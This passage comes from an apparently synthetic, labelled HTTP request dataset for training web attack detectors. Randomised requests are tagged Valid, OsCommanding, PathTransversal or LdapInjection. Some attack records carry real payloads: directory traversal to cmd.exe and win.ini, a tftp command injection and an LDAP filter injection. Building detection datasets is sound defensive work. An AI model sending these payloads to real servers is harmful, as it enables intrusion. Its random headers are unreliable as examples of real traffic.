Cookie: j14R=xml:setef1iahT0(;emaeod5rtos=ldmRgN@f;b2vasieoeh=mrcBnHE1Lbv;etIlrxaot9rdUu=0;b3l@bwhereform8HGTa=rRzvk0;t0stSteEe=catap4i
Cookie2: $Version="5"
Date: Thu, 29 Jan 09 01:16:55 CET
ETag: "@j93PQwdpk4Wwma"
Expect: 100-continue
From: Etwo@t45aetl.it
If-Modified-Since: Fri, 28 Dec 07 05:17:01 UTC
If-Unmodified-Since: Sun, 25 Jan 04 18:39:18 GMT
If-Match: "V7wcSN_i8QuCP19De"
If-None-Match: *
If-Range: Sat, 03 Apr 04 20:57:29 CET
Max-Forwards: 3078
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: senaTy nseaDz=wasioi
Authorization: Basic aUF3c21kYWk6YW1vbkU=
Range: -0418,311-
Referer: /vbreehsm/qetIb/CcrmCtp.cgi
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.7 (compatible; Konqueror/5.7; WinNT; aao9en; voahuona; i2stess)
UA-CPU: PowerPC
UA-Disp: 2710,0982,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 801x1629
Via: 2.2 www.rEnhm.png, ltuboy/3.9 185.3.153.86, FTP/3.2 www.toobjnTe.shtml
Transfer-Encoding: identity
Upgrade: s2or1r/5.6, unus/0.2, iUp/7.1
Warning: 301 www.ap3wwa.js "xdpCaybu" "Wed, 07 Apr 10 04:27:10 CET"
X-Forwarded-For: 52.147.136.153
X-Serial-Number: 848685
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43450
Start - Id: 44568
class: OsCommanding
POST /6_RkCndhUP/Bnga/iYnkD/8S/tILEmN3@kj.V_W/etcHaE4Bol/s_b4ZlGG8.aspx? HTTP/1.1
Content-Length: 166
Content-Language: la,oy
Content-Encoding: compress
Content-Location: /ssrdLi0/toslRwil.jsp
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 26 Sep 09 16:27:59 UTC
Last-Modified: Mon, 28 Mar 05 11:20:26 UTC
Host: 36.65.50.49
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: t1ldg0ue-1;q=0.8
Cache-Control: no-store
Client-ip: 10.34.240.53
Cookie: ritAeeDSxouanR=Op>hfiHl h
Date: Tue, 13 Apr 10 02:03:00 GMT
ETag: "Pdu5B-rYB0AW_8GO"
Expect: uwsaltSm=5myteE;eo7otdz=thwSy7x0
If-Modified-Since: Sun, 03 Apr 05 07:27:05 CET
If-Unmodified-Since: Wed, 06 May 09 12:33:04 GMT
If-Match: "gTPoAHpVZezeUIwt8"
If-None-Match: *
Max-Forwards: 6
MIME-Version: 1.5
Pragma: no-cache
Authorization: Basic dGJya3R3aGg6cEhpNWR0
Referer: /kjhvve/ndVhtoo/2wlbelLp/ec8lsnEq/bwhe.nsf
TE: gzip;q=0.4
User-Agent: Mozilla/4.2 (Windows; U; WinNT 6.8; as-OH; rv:7.1.1) Gecko/13752451
Via: FTP/5.6 178.17.91.193, HTTP/6.1 184.42.102.206, 9.3 www.mceleeS.htm
Transfer-Encoding: compress
X-Forwarded-For: 21.178.56.88

rcnehvc8a4gb=gtgtoaio\scriptj&sam4rsf=217.187.254.200 ;   tftp 192.168.10.33 test.txt&t6aoac8=tilu&-MTKVcprocessing-instructionJ5bO=oi@q&stnermnArtn1fss=9964536

End - Id: 44568
Start - Id: 45085
class: PathTransversal
GET /error/\..\..\..\..\winnt\win.ini? HTTP/1.0
Host: www.fcscgri.st
Connection: close
Accept: */*
Accept-Charset: utf-8;q=0.5, iso-2022-kr, iso-8859-5;q=0.2, iso-8859-15, windows-1257
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=6
Client-ip: 214.121.21.204
Cookie: evl4bir=42314;Ef0rj=oe7arWFhr7tse8;tckllelebd=455904
Cookie2: $Version="865"
Date: Mon, 22 Oct 07 17:00:14 GMT
ETag: W/"ripDnExYI_q8e4R"
Expect: 100-continue
From: uoSnnen@oz8Aa.ch
If-Modified-Since: Wed, 30 Nov 05 11:41:10 CET
If-Unmodified-Since: Mon, 20 Mar 06 13:02:50 GMT
If-Match: "m7e8SWEORE3SARe6"
If-None-Match: "Y8el-sjYmzeIAj0IW7"
If-Range: "dE-XGHqUO90YpYkq"
Max-Forwards: 486
MIME-Version: 9.2
Pragma: ly4z='pj'
Proxy-Authorization: Digest cnonce="lEha"
Authorization: NTLM ZWZzcGhlU3JhdGRXb2hyb3R0a3RybHpQaWVydGRpdXRkZW8=
Range: 61-,599945-,96-
Referer: /tmoEa7/cdn9tp/arlh8ie/p4ma/oeuA2H.php4
TE: trailers,chunked
Trailer: Connection
User-Agent: nhwte (0@6MZI26g; aR@R1qS; 4jaI64-FCE)
UA-CPU: StrongARM
UA-Disp: 0628,6146,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 1990x238
Via: HTTP/5.9 www.5noStnoe.png:1579, 6txea/1.9 227.39.180.139, 4.6 112.69.200.126
Transfer-Encoding: identity
Upgrade: ttpNf/8.4
Warning: 437 www.epd64fo.jpeg "eNe3tlcu" 
X-Forwarded-For: 138.45.117.11
X-Serial-Number: 324503957971792
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45085
Start - Id: 44391
class: OsCommanding
GET /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 164.243.191.71
Connection: close
Accept: application/x-tar, audio/x-wav;q=0.3, image/*;q=0.0
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 25.151.126.170
Cookie: Levali3Azc07p=hxKyH;e7mtzdemeWthe=eXH5r;tleshh=dlTwhl;odstt6e=ruea;hBCq=nqrdEvf?psa6sw;aglsOseRtoe43=eWUe
Cookie2: $Version="56"
Date: Sun, 12 Jul 09 08:48:29 CET
ETag: W/"JeOMB8IEzQqMZ5UXUF"
Expect: 100-continue
From: tdMWtde@lyHrvnefs.fr
If-Modified-Since: Fri, 07 Sep 07 11:36:25 UTC
If-Unmodified-Since: Sat, 14 Oct 06 12:43:03 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: omh4 yAzTEa=ty8o
Authorization: NTLM bGVyYXNpZWVhdXRvZGFsUmU2aW5zN29VdE5vb2VvZXNSZXl0YXlhcw==
Range: -843519
Referer: http://www.d2y7psZ.st/honsSss/q5D5H/Ivccsmae/enTdhco.jsp
TE: chunked;q=0.6
Trailer: Proxy-Authorization
User-Agent: Mozilla/9.3 (X11; U; Linux i386 5.8; rc-sk; rv:8.2.5) Gecko/32244424
UA-CPU: Sparc
UA-Disp: 9663,2173,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 8335x3340
Via: rspmf/0.1 www.omfma.png:74630, HTTP/2.8 3.126.114.224, 0.9 4.202.149.5
Transfer-Encoding: identity
Upgrade: asneah/1.8, akhg/1.6
Warning: 551 92.44.38.235:34239 "tifgnertsiaoesxw" 
X-Forwarded-For: 223.134.122.135
X-Serial-Number: 16212196997401300
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44391
Start - Id: 25696
class: Valid
GET /7M@i@PFgY/ti2lRdftpisdhaab72h/lrB/5ttceh3ee.mdb?dtedodtettpa=%3F%2Fernp&56xu5RHhlJ9=68721&sKdlthm9ritgii=so6ycd&tnel2Ucthwtac=atues-%3Bjsanphpn+ini%5Bds&odskpA=ocletpie9gdmor&NGvarDlogo8Ix-=3&A5Pra4omtaS=6625669 HTTP/1.1
Host: www.Tzn7o.biz:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.6
Accept-Language: ebsnhs-NI;q=0.0
Cache-Control: no-cache
Client-ip: 143.84.190.113
Cookie: DX-AiframeT=49359;ogbwsroeC5m9=otGzhesrhsr;connect7Mu2GTlr16=sh
Cookie2: $Version="13"
Date: Tue, 16 Jan 07 19:36:07 UTC
ETag: W/"ojCA4A.8hsaY1DNUbv"
Expect: aomansr
From: oyBm@Iqerhbe.st
If-Modified-Since: Tue, 29 Dec 09 02:51:19 UTC
If-Unmodified-Since: Sun, 15 Oct 06 14:54:58 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 03 Mar 07 15:11:19 UTC
Max-Forwards: 2
MIME-Version: 3.8
Pragma: loleei='0rgr'
Proxy-Authorization: NTLM YWV0SWFlclFSYnJldWUycm95Y3BkSWV0c3J3ZWM5aWZFTGFlZXBqcmh5Y2kwb0g=
Authorization: aopH qs8q=frSc
Range: 474-85459,37271-
Referer: http://www.BacT.uk/oo7n7ii/tieoc/w9je/iemtb1.ace
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/5.9 (Machintosh; U; PPC 8.8; w6-oa; rv:5.4.2) Gecko/90609853
UA-CPU: MIPS
UA-Disp: 564,067,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8973x257
Via: 8.7 www.iietpsh.css, 2.3 www.tTe9u.jpeg, 0.2 183.27.20.138:92
Transfer-Encoding: s1zte0; ttseifes=6Deii
Upgrade: ojeiet/9.9, woq/6.0, ttYs/5.7, urTi2/9.1
Warning: 888 www.iiliesnt.jpg "hDoneeNkaigrnn" 
X-Forwarded-For: 223.76.39.236
X-Serial-Number: 30259160107930
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25696
Start - Id: 37297
class: LdapInjection
POST /4ehno3n/E.ainsertreplace@Ce3/e6kslb1ZSxe/mdbul4tsi/x8E7nOid5ls./92j4It/h.ShxMcj/lsSobwiocyhhf/hqhola9nOcee/_nNeW6p.png? HTTP/1.1
Content-Length: 23
Content-Language: ee,tY
Content-Encoding: deflate
Content-Location: /GdSn.sh
Content-MD5: bmNPc05oYWRpRnlydW91dQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 24 Nov 07 10:18:02 GMT
Last-Modified: Sun, 18 Nov 07 19:00:47 GMT
Host: www.neusMQom.be
Connection: close
Accept: application/*;q=0.3
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: ernttag-euwen
Cache-Control: only-if-cached
Client-ip: 11.211.54.76
Cookie: dce=wnt;oa=)  ( | (1n=s8ds*);9N8mailV_n=htteiaieaccess_log
Date: Thu, 28 Apr 05 11:11:16 CET
ETag: W/"YZwLgk8rb4Cj_jsdXj"
Expect: 100-continue
From: eowonau@3othe.be
If-Modified-Since: Thu, 06 Sep 07 18:43:50 GMT
If-Unmodified-Since: Sat, 28 Aug 04 09:37:32 GMT
If-Match: *
If-None-Match: *
If-Range: "rzw14XA-wENZ.EhXG"
Max-Forwards: 37
Pragma: no-cache
Proxy-Authorization: llOn lpAe=ytlpnsrt
Range: -2513,9-129
Referer: /iottdre/2un8m.jsp
TE: trailers
User-Agent: ommqsrd/2.9.4.2
Via: Sec/3.9 www.NsxnMr8.jpg, 5.1 www.1ufmnei.js:13782
Transfer-Encoding: identity
Upgrade: aauhcS/9.9
Warning: 621 8.176.70.109 "iteG28eegnmdg6hf" "Wed, 24 May 06 04:01:08 UTC"
X-Forwarded-For: 158.169.133.144
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Kn73C45H=nceeOeNt0rwruP

End - Id: 37297
Start - Id: 5082
class: Valid
PUT /IvopxfscriptEHBk6IG/tM5CQV/nCcYl_qbB7/uFcance08-CP/swhsintnnsidrEt/lmk1RAh@JruPl7b93P/ecw3oenqxnU/AeenoWer2s.asmx? HTTP/1.1
Content-Length: 203
Content-Language: dwsns
Content-Encoding: compress
Content-Location: /dan1imrt/csuje/nprxe/aorans/eieeg.js
Content-MD5: Q2FlcnNldXJvOXR6bjFuZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 05 Oct 07 09:14:39 UTC
Last-Modified: Tue, 20 Jul 04 11:53:12 GMT
Host: 60.140.94.202:80
Connection: close
Accept: image/*;q=0.5, text/html, image/gif;q=0.1
Accept-Charset: *;q=0.3
Accept-Encoding: identity, gzip;q=0.2, deflate
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 46.99.192.239
Cookie: r9ic=khA3dtrir;rcts5RlOorosr=hMbgyCX;eiunaicfs6D44t=e@Dmi3EbD;lCsisKwsrdghn1j=r5;nt2uot=r su;leoemutsebt=ngsvarpasswd
Cookie2: $Version="8"
Date: Wed, 04 Feb 09 10:36:41 GMT
ETag: W/"w1nRMngetPnoVO-EXg"
Expect: 9patrest
From: npvh@lhUhfi.st
If-Modified-Since: Thu, 12 Aug 04 10:29:13 CET
If-Unmodified-Since: Tue, 30 Nov 04 17:05:55 UTC
If-Match: *
If-None-Match: "icmUAW83r3bfSltN"
If-Range: *
Max-Forwards: 069
MIME-Version: 3.6
Pragma: e=lhb
Proxy-Authorization: Basic dGlzRzhldzpsN3dpaW53eQ==
Authorization: Digest algorithm=MD5-sess
Range: 4666-,507125-81685,186998-
Referer: /5ujcteIi.tiff
TE: trailers,deflate,trailers
Trailer: Host
User-Agent: trwdwyrsl3laacv4r
UA-CPU: PowerPC
UA-Disp: 925,165,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 9463x8192
Via: 9.5 90.248.13.105, FTP/9.3 www.daBs.png
Transfer-Encoding: gzip
Upgrade: e6prei/5.1, o9ixn/0.8, oeRr/9.8, EimarD/3.9
Warning: 924 www.0aalst.html "scbouiehneadt8mn" "Wed, 22 Jun 05 19:29:52 CET"
X-Forwarded-For: 90.219.143.51
X-Serial-Number: 100173301629912
----: -----------------------
~~~~~: ~~~~~~~~~~

5Dg=1ew&wxshnwoeebm=51&eemawn24iPctsem=qa9s%un&cHioaeiir2ei=46509984&sodumlE9oel3=1273659&su-unioncp=gNHr7U3fIAWQ&33Ei=3ohuhzho7U3&iso17=360501&mhmeasn0go=5mail?Mo<ri\46wirpldm&eborortbrekl=raied

End - Id: 5082
Start - Id: 44110
class: OsCommanding
GET /_vti_bin/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.ste5.be:80
Connection: close
Accept: audio/x-wav;q=0.2, audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: k-aioi
Cache-Control: no-transform
Client-ip: 249.225.32.40
Cookie: cuhwme4aae=647
Cookie2: $Version="81"
Date: Mon, 09 Apr 07 06:34:52 GMT
ETag: "6ppIn19@NaQSoJPiB"
Expect: 100-continue
From: nvabn6ks@5obcxtres.uk
If-Modified-Since: Sat, 22 May 04 13:54:30 CET
If-Unmodified-Since: Sun, 09 Apr 06 21:55:04 GMT
If-Match: "Uv1ZNf812leJATaD"
If-None-Match: *
If-Range: Tue, 15 Apr 08 05:32:13 UTC
Max-Forwards: 1
MIME-Version: 5.1
Pragma: T=6hHjaal
Proxy-Authorization: Basic ZTA4aG86eWVvZA==
Authorization: NTLM aGN6aTVpd3RycnFzdGJvaHN0MnVqc2xpZ25hYWVkZm9saw==
Range: 827-
Referer: /2refo/e2ueL/Hnkam0b/6aSm7csy.txt
TE: deflate
Trailer: Date
User-Agent: Mozilla/6.2 (compatible; dddazsse; Linux i386; rImojsnihE; Hoaiee)
UA-CPU: x86
UA-Disp: 224,424,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1501x189
Via: 9.7 www.dyo3eslN.png, FTP/0.2 www.aica.tiff, 5.8 www.rsind045.html:514
Transfer-Encoding: gzip
Upgrade: 8sjta/1.7, OaiEm/9.0
Warning: 378 196.189.21.245:66 "hoiooiLnwuhilt51e" "Sun, 15 Jan 06 06:34:10 UTC"
X-Forwarded-For: 2.74.16.0
X-Serial-Number: 008751
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 44110
Start - Id: 31630
class: Valid
GET /LHc2/4nwzI_/o7uaenierse/eOH_XY9NLYzVFTXD0CMO/t2Z/my/c-Ido67/l@GJtmp2/oXhlPfRC2uxBHt/sYL.TXat1e56ftAj/esB.d-4Do.pl?tOc2e=573579&7aisvs=25&EhOQdTs=wo%3Dt&wt0nDirarAevvh=h+e%3Ea%3F+r+tdocument%28yxmlr8&tzxhs5f=neUiW9&ur=yHiIEsb&wKjl%u1formEGYX=+n%243%5B8ro HTTP/1.0
Host: 124.225.74.20
Connection: t0Note
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 51.126.92.214
Cookie: tshitkathtedhhf=m+EsjUM;s]Xiopen 
Cookie2: $Version="8"
Date: Sun, 14 Jan 07 15:29:30 GMT
ETag: W/"ywRJ44ZaNecFGg2Jqedc"
Expect: 100-continue
From: unmedtea@rTol7svi.it
If-Modified-Since: Wed, 01 Nov 06 22:56:52 UTC
If-Unmodified-Since: Mon, 30 Aug 04 06:13:47 UTC
If-Match: *
If-None-Match: "XhZIZZbYYkP9Qsx"
If-Range: Wed, 10 Aug 05 20:08:01 UTC
Max-Forwards: 0946
MIME-Version: 7.4
Pragma: n3escu=oLts
Proxy-Authorization: Digest response="4B6aB8CAa1D9dcf955967eDE7E368bbC"
Authorization: Digest cnonce="eOinxieA"
Range: 2998-103,-3,3141-
Referer: http://www.n4rzn.de/dtstliIt.html
TE: deflate;q=0.8
Trailer: Warning
User-Agent: iocsEhetlIemUdbmrn
UA-CPU: 68000
UA-Disp: 0279,131,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8191x528
Via: tKNt/1.1 www.rrtiiii.jpeg
Transfer-Encoding: deflate
Upgrade: o45mrn/3.4, Xue/3.4, Eoh/8.3, ote/8.9, 9Uiay/0.3
Warning: 978 www.uptale.png "3tTseeil7joaptosn" "Wed, 13 Sep 06 03:43:55 CET"
X-Forwarded-For: 13.228.134.190
X-Serial-Number: 049800080
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31630
Start - Id: 31199
class: Valid
GET /wDb/pPk1vEd/pIAbpU/phpgbLZWFghy/dKY7v6D/iehw7oozectk9.png?esCgh=0&L49WH.krSQ0a=emiOna&imfoasets=i3&dr=49&arM=331&qAHR=nteSwtuh36&connect6Dogz5x9=3&etdRrp6a=To8lglErro HTTP/1.0
Host: 107.236.212.117
Connection: tvbrl8n
Accept: */*
Accept-Charset: windows-1255;q=0.0, x-mac-japanese;q=0.3, x-mac-ce
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 203.218.237.207
Cookie: ttaeSon8s=o7ssiaPkoypnpd;ii6oznsneQtt5ea=0;ZLyEM8d=6;C66yNZ=415265967
Cookie2: $Version="19"
Date: Sun, 04 Feb 07 12:56:07 CET
ETag: "FF2Tro_rtx4@In80J"
Expect: 100-continue
From: htelogv@hahUen.st
If-Modified-Since: Mon, 07 Jun 04 05:29:47 GMT
If-Unmodified-Since: Sat, 01 May 04 14:39:48 GMT
If-Match: "4@07881kfZbFRFoDuL8"
If-None-Match: "Ee9BY8Rrd52Kwm4pd8"
If-Range: *
Max-Forwards: 65
MIME-Version: 5.4
Pragma: k5='s'
Proxy-Authorization: teu2uo dsgreat=oatpaa5a
Authorization: effnne atuae=iae4lcq
Range: 487-253698,1-,198-1
Referer: /eibtorac/wiDvtens/tu5g7.wmn
TE: gzip,deflate;q=0.8,chunked;q=0.7
Trailer: Expect
User-Agent: Mozilla/6.8 (X11; U; Unix 0.6; rj-Jr; rv:4.3.1) Gecko/17729463
UA-CPU: x86
UA-Disp: 974,643,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 3376x378
Via: 2.6 www.8thdaAi.css, 6.3 www.rieS.js
Transfer-Encoding: deflate
Upgrade: h3ih9e/0.0, 7mwpye/2.3, Es0/2.7, atargv/1.8
Warning: 967 9.3.197.185 "stmf" 
X-Forwarded-For: 169.197.9.202
X-Serial-Number: 06672933371501212247
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 31199
Start - Id: 12034
class: Valid
GET /EaptibNtrl/aApln/EnwhSe/smeaLbxehrednOzd/Dhsntano/SmeiITet1ullnsh7iN/tNsRoX2/t2XayXbZAnode2/bz8Hcbu5@9ID/ec2asRa7eeoareeh.php4?rAkthn3rmjoi=access_logpsustdin&beO9ske=3hidtaq1&lpQulwswreaots=tnWeUUsywD&iwmhq3ldiemovuE=dhBTgH29&cdnbaoyorbaole=positiond&nleuoP=wmM4rt%24%5Dson&5e7Ozi58ntt9eri=81767585&fch7zoutrepte=a+A+o&ychph=bhjoezrEa%3Ca&ce9ch4=onteeriyechal HTTP/1.1
Host: 178.200.102.68
Connection: 4ugdedu
Accept: video/*;q=0.7
Accept-Charset: *
Accept-Encoding: deflate, identity;q=0.3, identity;q=0.4, deflate;q=0.5, gzip
Accept-Language: br-cz1rnps;q=0.2
Cache-Control: max-stale
Client-ip: 149.5.101.39
Cookie: HdE7tls=mo5 se?rdivooe;gelezpnmz=7;Avseeewciewise=zfE
Cookie2: $Version="585"
Date: Thu, 13 Jul 06 14:54:53 CET
ETag: "4VdNvDxnQ_vOTnM_5thW"
Expect: 100-continue
From: bteasrrn@to2anee.fr
If-Modified-Since: Mon, 06 Apr 09 09:37:28 CET
If-Unmodified-Since: Wed, 26 Sep 07 14:42:41 CET
If-Match: *
If-None-Match: "HEr5V5gUvT8Ol.Bk"
If-Range: Wed, 05 May 04 15:22:34 UTC
Max-Forwards: 79
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Digest nc=117fd3f5
Authorization: hajt et08ea=oeev
Range: 421490-
Referer: http://sdsKyi3.net/nrf3u/oexe/l6ucrR/eddek.jpg
TE: trailers,chunked;q=0.7
Trailer: Via
User-Agent: Mozilla/3.1 (compatible; Konqueror/5.0; Win98; 9DvdBvatO; ahdeai9i)
UA-CPU: MIPS
UA-Disp: 123,4822,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 165x736
Via: 2.0 59.55.185.238, 8.9 37.46.141.239
Transfer-Encoding: gzip
Upgrade: hrhef/3.6, dhe/2.9, s8nhre/8.0, dorop/7.3, o9g/4.9
Warning: 833 144.28.17.62 "isfwPh1kyWgl" "Sun, 24 Sep 06 16:28:02 UTC"
X-Forwarded-For: 149.30.227.159
X-Serial-Number: 447031171
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12034
Start - Id: 24540
class: Valid
GET /mQk.3BLN@FSV/skcH6XfBH.asp?oiep=eronratcaeEhu&ndtAn=os&e6-winntV9oQcF=2971896&ESeEhrATrni=ytQvb9vs9Kl&devhwit7a=e6S0lk9gWw&xeozpiRofI=68122685 HTTP/1.1
Host: www.eg2s6e.cz
Connection: keep-alive
Accept: text/html, image/png;q=0.1, image/*;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: nyn-SrDor, Grsbk8-agUmaote;q=0.6, hs-yncits
Cache-Control: no-cache
Client-ip: 218.219.114.119
Cookie: hfnn=22;roi=265166
Cookie2: $Version="2"
Date: Wed, 11 Mar 09 10:42:06 GMT
ETag: W/"iB.OzctuyqalSvS"
Expect: nqso
From: leyen9ll@dgyc.uk
If-Modified-Since: Mon, 08 Jun 09 18:41:51 GMT
If-Unmodified-Since: Tue, 24 Jun 08 11:29:59 UTC
If-Match: "EpCIWedXKw_dM.lPyN"
If-None-Match: "vqwm7t8TfWkkv72cCk"
If-Range: Thu, 28 Dec 06 13:28:44 UTC
Max-Forwards: 0
MIME-Version: 1.2
Pragma: ul=doeep
Proxy-Authorization: oyTb n3auus1d=esdje3nn
Authorization: Basic aHRvZWRjOmNlaGdhaQ==
Range: -001651,-8
Referer: http://cEnenk.org/du77E.cfm
TE: trailers,chunked;q=0.2
Trailer: If-Modified-Since
User-Agent: naoWes7etIlletpnyu4e
UA-CPU: Sparc
UA-Disp: 1408,616,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 303x667
Via: 8.1 252.85.45.221, HTTP/8.7 www.ehsdpn.css
Transfer-Encoding: identity
Upgrade: prsuot/9.5, stt/6.8
Warning: 900 74.109.202.46:6 "oanoeaj2nll" "Sat, 13 Jan 07 24:32:28 GMT"
X-Forwarded-For: 150.103.175.246
X-Serial-Number: 185732331097779
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24540
Start - Id: 26051
class: Valid
GET /qL9L/4Mz5CSKWk/vmochaWqI/eDwGXFLxng@OVLA5/atmpgbw/habteknLeAE/eu/nV/ieAhanglo/AvP./N5mdcszusrm_pBf5.sh?9R7gaiwcban4mf=rl&Ie7eteau=728&yVnoUaeaaea=eSia3LxmWH3&h1ait=i%3Coa%2Bissbm6&aehmsemstdea=oxj1q_ho HTTP/1.1
Host: www.rertioi.de
Connection: keep-alive
Accept: audio/basic;q=0.5, audio/basic
Accept-Charset: *
Accept-Encoding: deflate;q=0.7, identity;q=0.3, gzip;q=0.2
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 99.160.1.157
Cookie: LLssrn7atotxt1e=qloY$sendsnwheree;d7d=o7waqtS;2eodum2R=4507;mlrF1dtean4rti=3275634;hr2iotseUo=honu;gsmyteceM=9physlmwdennaue
Cookie2: $Version="875"
Date: Wed, 14 Nov 07 21:49:10 GMT
ETag: W/"LvVKcJV9LTc@6otu9"
Expect: Ipaae=loBUveeu
From: alLeiF@uTy8difar.biz
If-Modified-Since: Mon, 10 Jul 06 06:51:32 GMT
If-Unmodified-Since: Wed, 22 Oct 08 04:29:30 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 680
MIME-Version: 4.1
Pragma: zt6tsfhx=ttsaro
Proxy-Authorization: Digest username="mpdha"
Authorization: Basic ZXRycnk6ZWVlZm10dQ==
Range: 077750-,-78409
Referer: http://www.Dmzooxet.net/etneAE/uemv/secies/sdwroeg.gif
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.5 (X11; U; Open BSD i586 2.9; t8-r3; rv:1.3.9) Gecko/00676198
UA-CPU: StrongARM
UA-Disp: 889,8239,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 096x0326
Via: 6.0 249.172.182.130
Transfer-Encoding: deflate
Upgrade: 33tso/9.6
Warning: 573 248.81.173.161 "hSShBh8osar8mnn" "Thu, 15 Jun 06 19:23:51 CET"
X-Forwarded-For: 217.162.242.84
X-Serial-Number: 6743288486222977
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26051
Start - Id: 25581
class: Valid
GET /-var1bgsound/eolpetsm1a/tohodS6esetl0/e2qL1Iztk/2lmpassthrumfy/5t0dEUuQoXLf5L_/qO-WSCibmrwQ.cfm?GCj8inAimorM=etntsd&epl=tKGVXA0xb&vetibEh3iu1i3po=divNAh%7E&K2DC.Ga2g=nh6tv&osc=57430&pxterm_Lv=a%5D&ekou=583549795&croceodgeA=laeOi&cDmzotaar=Trheescb+oditdnErea%40&Ltm7e=%24niOwlR1n%5B8eilocationehdDt&wpa8tD=e8 HTTP/1.0
Host: 114.59.138.4:80
Connection: close
Accept: */*
Accept-Charset: x-mac-japanese, windows-1250
Accept-Encoding: gzip;q=0.0, deflate, identity;q=0.6, deflate;q=0.4
Accept-Language: kn-nsoq0i, eat-o, r-jpaxE;q=0.6
Cache-Control: only-if-cached
Client-ip: 107.15.10.200
Cookie: I9-DGI=aewgoArgie;Rfnmahxfi23w=6
Cookie2: $Version="66"
Date: Mon, 09 May 05 10:52:03 CET
ETag: "NNBf2owU_ntQDH3l5"
Expect: 100-continue
From: camaabz@oEUygi.cz
If-Modified-Since: Sun, 23 Aug 09 20:58:59 CET
If-Unmodified-Since: Tue, 20 Oct 09 09:36:27 GMT
If-Match: "pbFbhnMpeLuxlvC"
If-None-Match: *
If-Range: Fri, 22 Aug 08 08:58:25 CET
Max-Forwards: 3277
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: NTLM cm9lVm13NTZlNGlnQXRoaW9lbWF0bmw5Z2VlZmhuZTRUOG9O
Authorization: zt2xTa tApewa=en2evtt
Range: 04-58
Referer: /5nbprs.sh
TE: deflate
Trailer: If-Modified-Since
User-Agent: Mozilla/9.1 (Windows; U; Windows NT 0.1; ra-uk; rv:0.6.0) Gecko/01975944
UA-CPU: Sparc
UA-Disp: 242,0728,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 437x001
Via: 3.4 www.oirnuH.html, 0.8 215.44.115.174:88249, FTP/7.5 www.sbneacwe.tiff
Transfer-Encoding: identity
Upgrade: ohwH/4.5
Warning: 075 www.b09if.gif "I7sdc" "Fri, 08 Dec 06 21:00:33 CET"
X-Forwarded-For: 255.93.182.143
X-Serial-Number: 644521
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25581
Start - Id: 33151
class: Valid
PUT /ybgsoundSdocumentqzchildxp_cmdNVJdelete.M/5sryC/beeoh3sf3EgtsmoacStr/pql2/Aplsals7pcgdnedert/cKz6oruIDugUR.php? HTTP/1.1
Content-Length: 124
Content-Language: eanr,SnVhn,nr
Content-Encoding: identity
Content-Location: /mtftcdxe/o7x5/y04undld.pl
Content-MD5: bmVucHdYZWN1bGl1b3R1eQ==
Content-Type: application/x-www-form-urlencoded
